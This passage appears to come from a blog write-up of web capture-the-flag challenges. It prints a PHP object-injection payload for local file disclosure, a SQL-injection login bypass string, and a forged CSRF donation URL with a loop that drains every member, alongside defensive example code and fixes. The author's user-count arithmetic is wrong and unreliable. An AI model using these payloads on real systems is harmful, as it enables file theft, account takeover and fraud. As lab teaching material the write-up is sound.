<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3J9yU9CCcIOZDiN3kUe1FRAi2TIvA_fGCP0mDSelE8EMrwx9sqlhCyA12hd2vlTBTZRvt7pvSrVAzw-CAlLKuQ5iZBs1vwM0Ri-rt6k5iAX8jNyZWXLA3aOgsCEn6zEdMVzbZIFUwzo0/s1600/Screenshot_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3J9yU9CCcIOZDiN3kUe1FRAi2TIvA_fGCP0mDSelE8EMrwx9sqlhCyA12hd2vlTBTZRvt7pvSrVAzw-CAlLKuQ5iZBs1vwM0Ri-rt6k5iAX8jNyZWXLA3aOgsCEn6zEdMVzbZIFUwzo0/s1600/Screenshot_3.png" /> </a></div>
<div class="separator" style="clear: both; text-align: left;">
And here is the given source code:</div>
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue;">http://pastebin.com/raw.php?i=g2NQbr8P</span></div>
</blockquote>
From the source code it can clearly be seen that direct user input is passed to the unserialize function, which is a security risk and can result in code execution. It can also be seen that a vulnerable magic method, "__destruct", exists in the class named "CreateFile", which lives in the same context (or file) as the unserialize call.<br />
<br />
Here is the vulnerable line of code:<br />
<blockquote class="tr_bq">
<span style="color: red;">readfile(dirname(__FILE__) . '/' . $this->tmpfile); </span></blockquote>
Anybody with a basic understanding of object injection knows that the values of the class properties can be set at will through the input passed to "unserialize". Thus, we can set the value of "tmpfile", which is a member of the reconstructed class instance.<br />
<br />
So here is the input payload I submitted which resulted in Local File Disclosure.<br />
<blockquote class="tr_bq">
<span style="color: red;">O:10:"CreateFile":1:{s:7:"tmpfile";s:15:"unserialize.php";}</span></blockquote>
For anyone not familiar with serialization, here is the code I wrote to generate this payload.<br />
<blockquote class="tr_bq">
<span style="color: blue;">http://pastebin.com/raw.php?i=FkUFveGp </span></blockquote>
A "KEY" was defined in the source code of unserialize.php.<br />
<br />
The MD5 hash of that key was the flag for this challenge.<br />
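An added example in Python (not the writeup's generator script from the pastebin link above, and not the challenge's PHP): a small parser for PHP's serialize() format that reports which classes an input would instantiate and, like PHP's unserialize() with its allowed_classes option, refuses objects that are not on an allowlist. It is run over the payload quoted above, which is the only value taken from the writeup; everything else is constructed.

```python
from dataclasses import dataclass, field

# Payload from the writeup: one CreateFile object whose tmpfile property is attacker chosen.
WRITEUP_PAYLOAD = 'O:10:"CreateFile":1:{s:7:"tmpfile";s:15:"unserialize.php";}'


class PhpSerializeError(ValueError):
    """Malformed input, or an object of a class that is not on the allowlist."""


@dataclass
class PhpObject:
    class_name: str
    properties: dict = field(default_factory=dict)


class _Reader:
    """Recursive-descent reader for PHP's serialize() format (N, i, s, a, O)."""

    def __init__(self, data: bytes):
        self.data, self.pos, self.class_names = data, 0, []

    def expect(self, token: bytes) -> None:
        if not self.data.startswith(token, self.pos):
            raise PhpSerializeError(f"expected {token!r} at offset {self.pos}")
        self.pos += len(token)

    def read_until(self, delim: bytes) -> bytes:
        end = self.data.find(delim, self.pos)
        if end < 0:
            raise PhpSerializeError(f"missing {delim!r} after offset {self.pos}")
        token, self.pos = self.data[self.pos:end], end + len(delim)
        return token

    def read_string(self) -> str:
        length = int(self.read_until(b":"))  # <byte length>:"<bytes>", the length wins
        self.expect(b'"')
        raw = self.data[self.pos:self.pos + length]
        if len(raw) != length:
            raise PhpSerializeError("string shorter than its declared length")
        self.pos += length
        self.expect(b'"')
        return raw.decode("utf-8", errors="replace")

    def read_pairs(self) -> dict:
        count = int(self.read_until(b":"))  # <count>:{ key value ... } for arrays and objects
        self.expect(b"{")
        pairs = {}
        for _ in range(count):
            key = self.value()
            if not isinstance(key, (int, str)):
                raise PhpSerializeError("array keys must be integers or strings")
            pairs[key] = self.value()
        self.expect(b"}")
        return pairs

    def value(self):
        if self.pos >= len(self.data):
            raise PhpSerializeError("unexpected end of input")
        kind, self.pos = self.data[self.pos:self.pos + 1], self.pos + 1
        if kind == b"N":
            self.expect(b";")
            return None
        self.expect(b":")
        if kind == b"i":
            return int(self.read_until(b";"))
        if kind == b"s":
            text = self.read_string()
            self.expect(b";")
            return text
        if kind == b"a":
            return self.read_pairs()
        if kind == b"O":
            name = self.read_string()
            self.class_names.append(name)  # recorded even when nested inside arrays
            self.expect(b":")
            return PhpObject(name, self.read_pairs())
        raise PhpSerializeError(f"unsupported type tag {kind!r}")


def classes_in(data) -> list:
    """Class names the input would instantiate: a cheap signal for logging or a WAF rule."""
    reader = _Reader(data.encode() if isinstance(data, str) else bytes(data))
    reader.value()
    return reader.class_names


def php_unserialize(data, allowed_classes=frozenset()):
    """Like unserialize($data, ['allowed_classes' => [...]]), but a disallowed class
    rejects the whole input instead of becoming __PHP_Incomplete_Class as in PHP."""
    reader = _Reader(data.encode() if isinstance(data, str) else bytes(data))
    result = reader.value()
    if reader.pos != len(reader.data):
        raise PhpSerializeError(f"trailing bytes at offset {reader.pos}")
    for name in reader.class_names:
        if name not in allowed_classes:
            raise PhpSerializeError(f"object of class {name!r} is not allowed")
    return result


def is_rejected(data, allowed_classes=frozenset()) -> bool:
    try:
        php_unserialize(data, allowed_classes)
    except ValueError:  # PhpSerializeError plus int() failures on garbage numbers
        return True
    return False
```

With an empty allowlist the writeup's payload is refused before any object exists, which is the behaviour a PHP endpoint gets from allowed_classes, while plain arrays still decode.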
<div class="separator" style="clear: both; text-align: left;">
</div>
<h4>
7. Cross-site Request Forgery (CSRF)</h4>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp8rFUWt3ehoeNcwzll1hd2XVux0yByzSPAN7kb3peAxPvY58gilk7fQ8zcQIWTN-GbaKAmlNquD4tasMMQbwuJo6Oj5n2UErjUcnS24iJXx64X84C61s-SfaBBTGOA7vpGRx05cNqjTo/s1600/Screenshot_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp8rFUWt3ehoeNcwzll1hd2XVux0yByzSPAN7kb3peAxPvY58gilk7fQ8zcQIWTN-GbaKAmlNquD4tasMMQbwuJo6Oj5n2UErjUcnS24iJXx64X84C61s-SfaBBTGOA7vpGRx05cNqjTo/s1600/Screenshot_4.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
The scenario of this challenge seemed unrealistic to me for many reasons. But who cares, right? The goal was to solve the challenge, which I did.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The following hint was provided in the challenge details.</div>
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #b45f06;">Hint: It's awesome when other people do things for you, isn't it?;)<br />The simulation of this hint, so the biggest part of this challenge is at "fake_user.php" file</span></div>
</blockquote>
And the credentials of a user account were also given.<br />
<br />
The URL provided for this challenge had a small web application for bank management. There was a login page, which can be seen in the screenshot below.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_k3oSuCGC3ggOJhoPN4QbMl-bPv763Z0pwB3PZ6R8PJs8yMt_Dz3kDkkbVH4PZeYZ3eKEuhX1kXPH2v7ChVS6LszZJV2QWwgsCJntsgARjXYmc9SmdIG1avcha26C3fYN5__IfCVT8eg/s1600/Screenshot_5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_k3oSuCGC3ggOJhoPN4QbMl-bPv763Z0pwB3PZ6R8PJs8yMt_Dz3kDkkbVH4PZeYZ3eKEuhX1kXPH2v7ChVS6LszZJV2QWwgsCJntsgARjXYmc9SmdIG1avcha26C3fYN5__IfCVT8eg/s1600/Screenshot_5.png" height="459" width="577" /></a></div>
<br />
So I logged in using the provided credentials and noticed that a donation page existed, which could be used to donate money to other members of the bank.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjElri1CrTXlskj9_GQPQvjWCy9i6obfV7r0qLgkrXNKWRfq3Mxn4sasTnx7CR5DrAegpT-ySFgXPKFjIxU_CqqEfzCQcOSGk9JgtBG8RVrP0SZ_J9w6vFH3VXcVLeYG2ZxHmLuWkbBxj8/s1600/Screenshot_6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjElri1CrTXlskj9_GQPQvjWCy9i6obfV7r0qLgkrXNKWRfq3Mxn4sasTnx7CR5DrAegpT-ySFgXPKFjIxU_CqqEfzCQcOSGk9JgtBG8RVrP0SZ_J9w6vFH3VXcVLeYG2ZxHmLuWkbBxj8/s1600/Screenshot_6.png" /></a></div>
<div dir="ltr" style="text-align: left;" trbidi="on">
The goal of this challenge was to become the richest in the bank. The user whose credentials were provided had $10 in the account, and it was mentioned that the current richest person in the bank had <span class="color1">$1131.</span><br />
<span class="color1"><br /></span></div>
<div dir="ltr" style="text-align: left;" trbidi="on">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPbVGHZpjzC59ItnaTlgsBAlMhH31cImldwh9tmWgxwpzM6aPIXkejz6FwrFg39ypdPQTejVVVS3TLzbUq8u0H2TeaZk4U2TR2kXmiqa9gfwh-Znq-V1fIamFTBfzfGZw75AX1f_tWxaA/s1600/Screenshot_7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPbVGHZpjzC59ItnaTlgsBAlMhH31cImldwh9tmWgxwpzM6aPIXkejz6FwrFg39ypdPQTejVVVS3TLzbUq8u0H2TeaZk4U2TR2kXmiqa9gfwh-Znq-V1fIamFTBfzfGZw75AX1f_tWxaA/s1600/Screenshot_7.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div dir="ltr" style="text-align: left;" trbidi="on">
</div>
<div dir="ltr" style="text-align: left;" trbidi="on">
</div>
<div dir="ltr" style="text-align: left;" trbidi="on">
<span class="color1"> Oh, and </span>there is a donation page? At this point I knew that the donation system would be the vulnerable part. So I donated $5 to a random person (who shouldn't be thankful to me) to learn how it worked. <br />
<br />
It was discovered that a request was made to a page "sendmoney.php" with GET parameters that included the sender, receiver, amount, etc. The original parameter names can be seen in the link below:<br />
<br />
<blockquote class="tr_bq">
<span style="color: blue;">/sendmoney.php?frommemberID=99999&memberID=1&member=John Smith&ammount=5 </span></blockquote>
I tried to tamper with the "frommemberID" parameter, but without success. It seemed that the donation page was checking whether the "frommemberID" value matched that of the currently logged in user. The resulting page had this message:<br />
<blockquote class="tr_bq">
<span style="color: #b45f06;">So you want to steal money?? This is not the correct way!</span></blockquote>
Then I remembered the hint, i.e. fake_user.php. That page was a user simulator. It also had other (a little too much) information. Here is what was mentioned there:<br />
<br />
<blockquote class="tr_bq">
<span style="color: #b45f06;">Welcome CSRF Master!</span> <span style="color: #b45f06;"><br />As you already know, the donation form is vulnerable to CSRF. </span> <span style="color: #b45f06;"><br /> You also know, that to become the richest in the bank and win the gorgeous prize you must steal some money from all the members in the bank. <br /> Hey, not too much...max $5 (the donation budget)! </span> <span style="color: #b45f06;"><br /> We know, and you too, that to do a CSRF attack we need a victim that follows our links. <br /> Well, to simplify we have made the following form. </span><br />
<br />
<span style="color: #b45f06;">This form simulate a user logged in his members area that clicks on a given link.</span></blockquote>
Below this text was a form with a field for the URL that the simulated victim would visit. To cut to the chase, the donation URL was meant to be submitted through the form on the "fake_user.php" page. So I tested it by pasting the same URL that I had tried directly earlier, and here was the result:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyNNT8E7xFztcUT5L5IP-xi6phjQO7yBfT4mdLPIe3JsY5snPjTF4jqC2IPYuyjam8VuDY0osvjeFlbX5zOdEWgNcIUMa5SvQRBQngbO1chOYHrSEJ-FtZRvK3jQfVv_zpWOR-aOLYc6I/s1600/Screenshot_8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyNNT8E7xFztcUT5L5IP-xi6phjQO7yBfT4mdLPIe3JsY5snPjTF4jqC2IPYuyjam8VuDY0osvjeFlbX5zOdEWgNcIUMa5SvQRBQngbO1chOYHrSEJ-FtZRvK3jQfVv_zpWOR-aOLYc6I/s1600/Screenshot_8.png" /></a></div>
</div>
<div dir="ltr" style="text-align: left;" trbidi="on">
Then I checked the balance: it had $5 more than the previous balance of $10, i.e. $15 in total. Now I had to steal another $1132 in order to be the richest in the bank. $1132 divided by $5 (the maximum donation allowed) equals 228 (users), but I already had $15, so 228 minus 15 = 212; this was the number of users I had to steal from. Submitting each URL manually (to steal $5 from each of the 212 users) would have taken a long time, so I coded a little PHP script to automate the task.<br />
<br />
Here is the code of that script:<br />
<blockquote class="tr_bq">
<span style="color: blue;">http://pastebin.com/raw.php?i=QbXDbJhp</span></blockquote>
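The pastebin link above is the original script. What follows is an added example, not the challenge's code or the author's script: an in-memory model of the bank's sendmoney.php, the fake_user.php victim simulator, and the automation loop, so the point of this challenge can be seen offline. The key observation is that checking "frommemberID matches the session" only stops parameter tampering; a link followed by the victim's own browser carries the victim's cookie, so that check passes. Member IDs, cookie names and balances are constructed here; the misspelled "ammount" parameter is the challenge's own.

```javascript
// Added example (not the challenge's code). Assumed: members are identified by
// numeric IDs and each has a session cookie "SESS-<id>" mapping to that ID.
const MAX_DONATION = 5;

class Bank {
  constructor(balances) {
    this.balances = new Map(Object.entries(balances).map(([id, v]) => [Number(id), v]));
    this.sessions = new Map(); // cookie -> memberID
    this.tokens = new Map();   // cookie -> anti-CSRF token (used by the hardened handler)
    for (const id of this.balances.keys()) {
      const cookie = `SESS-${id}`;
      this.sessions.set(cookie, id);
      this.tokens.set(cookie, `tok-${id}-${Math.random().toString(36).slice(2)}`);
    }
  }

  // Vulnerable sendmoney.php: the sender must equal the session's member, which
  // defeats tampering with frommemberID but not a request the victim's browser sends.
  sendMoney(cookie, params) {
    const me = this.sessions.get(cookie);
    if (me === undefined) return 'not logged in';
    if (Number(params.frommemberID) !== me) return 'So you want to steal money?? This is not the correct way!';
    const amount = Number(params.ammount);
    if (!(amount > 0 && amount <= MAX_DONATION)) return 'invalid amount';
    const to = Number(params.memberID);
    if (!this.balances.has(to) || this.balances.get(me) < amount) return 'refused';
    this.balances.set(me, this.balances.get(me) - amount);
    this.balances.set(to, this.balances.get(to) + amount);
    return 'ok';
  }

  // Hardened variant: additionally require a per-session secret that a
  // third-party page cannot read, so a forged link fails even with the cookie.
  sendMoneySafe(cookie, params) {
    if (params.csrf_token !== this.tokens.get(cookie)) return 'missing or wrong CSRF token';
    return this.sendMoney(cookie, params);
  }
}

// Same GET URL shape as on the page, with the victim as sender and us as receiver.
function donationUrl(victimId, attackerId, amount = MAX_DONATION) {
  const q = new URLSearchParams({
    frommemberID: String(victimId), memberID: String(attackerId), member: 'x', ammount: String(amount),
  });
  return `/sendmoney.php?${q}`;
}

// fake_user.php: a logged-in member "clicks" the link, so the request is
// replayed with that member's cookie attached.
function victimVisits(bank, victimId, url, handler = 'sendMoney') {
  const u = new URL(url, 'http://bank.invalid');
  return bank[handler](`SESS-${victimId}`, Object.fromEntries(u.searchParams));
}

// The automation loop from the write-up: one forged visit per other member.
function drainAll(bank, attackerId, handler = 'sendMoney') {
  const results = {};
  for (const id of bank.balances.keys()) {
    if (id === attackerId) continue;
    results[id] = victimVisits(bank, id, donationUrl(id, attackerId), handler);
  }
  return results;
}
```

Running `drainAll` against a `Bank` shows every member losing $5 to the attacker through `sendMoney`, while the same loop against `sendMoneySafe` is refused for every victim because the forged URL cannot carry the victim's token; a legitimate form submission that includes the token still succeeds.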
So after executing the script, I checked the balance page and this was the result:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKnyVA2uZR4eXOihyPLk47ZoXEaOdaGBT3VzyBGnRaNqbL2zgat8Bg4ZYbUBo9S3C8Db9PNQh4QE6NLF2TvqNvWbLbkzD8IZVJ9ARKjEXrZk0Q0uVFX_roCnjuVejVxYJe_Ynuf6eTDWw/s1600/Screenshot_10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKnyVA2uZR4eXOihyPLk47ZoXEaOdaGBT3VzyBGnRaNqbL2zgat8Bg4ZYbUBo9S3C8Db9PNQh4QE6NLF2TvqNvWbLbkzD8IZVJ9ARKjEXrZk0Q0uVFX_roCnjuVejVxYJe_Ynuf6eTDWw/s1600/Screenshot_10.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
</div>
<div dir="ltr" style="text-align: left;" trbidi="on">
The MD5 checksum of the image displayed on the page was the flag for this challenge.<br />
<div class="separator" style="clear: both; text-align: left;">
</div>
<h4>
6. Authentication Bypass (SQLi)</h4>
</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4EfFPbEVU21IrXsH7smh0kynI8qYIU4otwY8fX_DIktcklYobd-xKUqUaazBKbl1xWeIlz_YPzi9-fAuPUQIZBOtaGlsXLvMCtAD6UHCwBqkBkYHN-gwfbf8PpwOjuJjeoxGyyN6ZC3I/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4EfFPbEVU21IrXsH7smh0kynI8qYIU4otwY8fX_DIktcklYobd-xKUqUaazBKbl1xWeIlz_YPzi9-fAuPUQIZBOtaGlsXLvMCtAD6UHCwBqkBkYHN-gwfbf8PpwOjuJjeoxGyyN6ZC3I/s1600/2.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
This challenge seemed more interesting than the previous bypass challenge (#9 in this list). Just like that challenge, a sign-in form could be seen on the front page (index.php).</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTx5r09CnD4g3praUjtGOWA9-iU4i1BhEZJ4DRAmjPzxJis_TyHJXkCDdrXVVVgwlPXXrIoxf1snX-AhjVeFWAoHm-ospRgFVlealTi3F8UQal3p1VQvlZzBBgFJlg7y-McwD2QozixqQ/s1600/2.2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTx5r09CnD4g3praUjtGOWA9-iU4i1BhEZJ4DRAmjPzxJis_TyHJXkCDdrXVVVgwlPXXrIoxf1snX-AhjVeFWAoHm-ospRgFVlealTi3F8UQal3p1VQvlZzBBgFJlg7y-McwD2QozixqQ/s1600/2.2.png" height="301" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
An AJAX call to 'login.php' with POST parameters ('username' and 'password') was generated upon submitting the form. At first I expected an easily discoverable but tricky SQL injection vulnerability, but it turned out to be the opposite.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
It didn't take me long to figure out that the inputs (sent via the POST method) were being filtered, restricting them to alphanumeric characters and spaces. At this point it started to become interesting. After testing cookies and headers for possible SQL injection bugs, I stopped thinking like a pentester and started thinking like a programmer. After brainstorming for about 10 minutes, it occurred to me: what if the programmer had made a mistake while filtering the input? With the hypothesis that the filter might be applied only to $_POST while the query used $_REQUEST (which merges GET and POST values, and depending on request_order cookies too), I took the POST parameters and sent them as GET parameters with an apostrophe, and voilà, an error appeared on the page.</div>
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #b45f06;"><i>Error: You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use
near 'g00n' LIMIT 0,1' at line 5</i></span></div>
</blockquote>
First I thought of extracting the admin username and password from the database, but I figured that was unnecessary if the authentication could be bypassed with the good old "<b>x' or 'x'='x</b>".<br />
<blockquote class="tr_bq">
<span style="color: blue;">/login.php?username=x' or 'x'='x&password=x' or 'x'='x</span></blockquote>
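The following is an added example, not the challenge's PHP source, modelling the mistake described above in JavaScript: the sanitiser covers the POST body, but the query is built from a merged request array, the way PHP's $_REQUEST merges GET and POST (POST winning on a name collision). The SQL is only assembled as a string here, not executed; the corrected handler reads exactly the source it validated and passes values as bind parameters instead of splicing them into the statement. Parameter names follow the page; the filter's exact character class is assumed from the write-up's description.

```javascript
// Added example (not the challenge's code). Models a PHP login handler that
// filters $_POST but queries with $_REQUEST, and its fixed counterpart.
const ALNUM_SPACE = /^[A-Za-z0-9 ]*$/;

// PHP's $_REQUEST with request_order "GP": GET first, then POST overrides.
function phpRequest(get, post) {
  return { ...get, ...post };
}

// The filter the write-up observed: alphanumerics and spaces only, applied to POST.
function sanitizePost(post) {
  for (const [name, value] of Object.entries(post)) {
    if (typeof value !== 'string' || !ALNUM_SPACE.test(value)) {
      throw new Error(`rejected POST parameter ${name}`);
    }
  }
  return post;
}

// Vulnerable: validation and query read from different sources. Sending the
// parameters as GET leaves $_POST empty (the filter passes) while $_REQUEST
// still carries the attacker's values into the SQL string.
function buildQueryVulnerable(get, post) {
  sanitizePost(post);
  const r = phpRequest(get, post);
  return `SELECT username FROM users WHERE username='${r.username}' AND password='${r.password}' LIMIT 0,1`;
}

// Fixed: read one source, require the fields, and never concatenate input
// into SQL; the driver binds the values, so quotes are just data.
function buildQueryFixed(post) {
  sanitizePost(post);
  if (typeof post.username !== 'string' || typeof post.password !== 'string') {
    throw new Error('username and password are required in the POST body');
  }
  return {
    sql: 'SELECT username FROM users WHERE username=? AND password=? LIMIT 0,1',
    params: [post.username, post.password],
  };
}
```

With `x' or 'x'='x` in both fields the vulnerable string becomes `... WHERE username='x' or 'x'='x' AND password='x' or 'x'='x' LIMIT 0,1`; the trailing `or 'x'='x'` makes the WHERE clause true for every row, and `LIMIT 0,1` hands back the first user, which is why the page greeted the author as "Ciro" without knowing any password.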
<br />
<div class="separator" style="clear: both; text-align: left;">
So upon sending a GET request to login.php with the injection payload, a message appeared on the page which said "<b>Correct loginCiro</b>", and the SESSID cookie was set in the browser.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Then I opened the main page which redirected to another page named private.php and that page had an image slider on it with five images.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The MD5 checksums of four out of the total five images were the flags for this challenge.</div>
<h4>
5. Supposedly Analytical Test (bypassed via automation)</h4>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtWo9U30EvwOf84JJI8Tlgk3DrisP4Rd-GO3I68ulICprvndF1LlaW2ZUd7tIFR7rc9JrYYU4XUxZJxH446o617TX_7TkemePcrQNWekgDAJZG-MVbYVAj7m1v5JEkaVjQbTQjBQOZVfE/s1600/Screenshot_11.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtWo9U30EvwOf84JJI8Tlgk3DrisP4Rd-GO3I68ulICprvndF1LlaW2ZUd7tIFR7rc9JrYYU4XUxZJxH446o617TX_7TkemePcrQNWekgDAJZG-MVbYVAj7m1v5JEkaVjQbTQjBQOZVfE/s1600/Screenshot_11.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Okay, this was one weird challenge, lol. It was supposed to break my brain, which it failed to do. Let me explain how.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
On the challenge page, we had to choose either the minimum or the maximum (the page randomly asked for one or the other) from a list of numbers that was also displayed on the page. The initial score was zero. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmb-SUcpTfwffVKpO0znUX8j7i-dmyPoCD3WCr84IkJSi6skGw-6ME78bn-jiZeqsgNmA0lQRJ4FQWE_8F5wIRm230eFEULj1y87yL_OV5Qaf1fo69W7vTWTrAS1vCTIbJm2kAJIooebM/s1600/Screenshot_13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmb-SUcpTfwffVKpO0znUX8j7i-dmyPoCD3WCr84IkJSi6skGw-6ME78bn-jiZeqsgNmA0lQRJ4FQWE_8F5wIRm230eFEULj1y87yL_OV5Qaf1fo69W7vTWTrAS1vCTIbJm2kAJIooebM/s1600/Screenshot_13.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
The session expires after 120 seconds, which resets the score to zero. One wrong answer and the score becomes zero as well. Choosing the minimum or maximum of two numbers? Should be easy, huh?</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
But wait, the count of numbers increases as the score increases, which means that when the score becomes one there are three numbers to choose from, and when the score becomes two, four numbers are displayed. Still seems doable, right? Okay, let's mix negative and positive numbers and then let the game begin.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
When the score reaches 10, there are 13 numbers, both positive and negative, and we have to choose the minimum or maximum among them. And we still did not know what score was required to win the game, so the ideal solution was automation.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
I coded a PHP script to determine and submit the answers automatically and stop when the key was found.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Here is the code of that PHP script:</div>
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue;">http://pastebin.com/raw.php?i=WfWv4zKf</span></div>
</blockquote>
The result that this script generated can be seen in the screenshot below.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4cfoG4D6zgSumtCnBAs0n7Nv4D2MzyoFWdJyvjqjPEfdzKDNwBXTTmUPusPJvXyVNSO2zKtl5gQ_2VkCPG2rjosLC5l8RJjifCsfe0q2P6d_9tqBaxA8rHu5VN4P_Ri70WbeZgnZTN94/s1600/Screenshot_14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4cfoG4D6zgSumtCnBAs0n7Nv4D2MzyoFWdJyvjqjPEfdzKDNwBXTTmUPusPJvXyVNSO2zKtl5gQ_2VkCPG2rjosLC5l8RJjifCsfe0q2P6d_9tqBaxA8rHu5VN4P_Ri70WbeZgnZTN94/s1600/Screenshot_14.png" /></a></div>
<br />
It turned out that the key is displayed when the score exceeds 50.<br />
<br />
The MD5 hash of that key was the flag for this challenge.<br />
<br />
<br />
<b>4. Reversing JavaScript Code</b><br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ-IrkFX4JU8tdD21m5OtTd4c0N-QVz2wjxfWZXKeVDvXD43rCqkx9rCV9F5LDkKVJDQRiq3q04gbPEiTVsmBBi4WZxVEXACwyo7zKwd0mHYzRtBCyb9QjgFhMtcPYeycb9dXVrMTVPPI/s1600/Screenshot_15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ-IrkFX4JU8tdD21m5OtTd4c0N-QVz2wjxfWZXKeVDvXD43rCqkx9rCV9F5LDkKVJDQRiq3q04gbPEiTVsmBBi4WZxVEXACwyo7zKwd0mHYzRtBCyb9QjgFhMtcPYeycb9dXVrMTVPPI/s1600/Screenshot_15.png" /> </a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
This challenge was interesting. It was like a riddle with a little twist.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
A hint was provided in the description of the flag which said:</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<blockquote class="tr_bq">
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #b45f06;">This challenge has more than 150 solutions, but are you able to find the one that starts with <b>«#</b>? If yes, give me the MD5 of that value!</span></div>
</blockquote>
<div class="separator" style="clear: both; text-align: left;">
The main page (main.html) of this challenge had a sign-in form. Upon submitting the form, a JavaScript function (named "ReverseCheck") was called which checked whether the entered password was correct. The username was hard-coded as "admin" in the same function.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
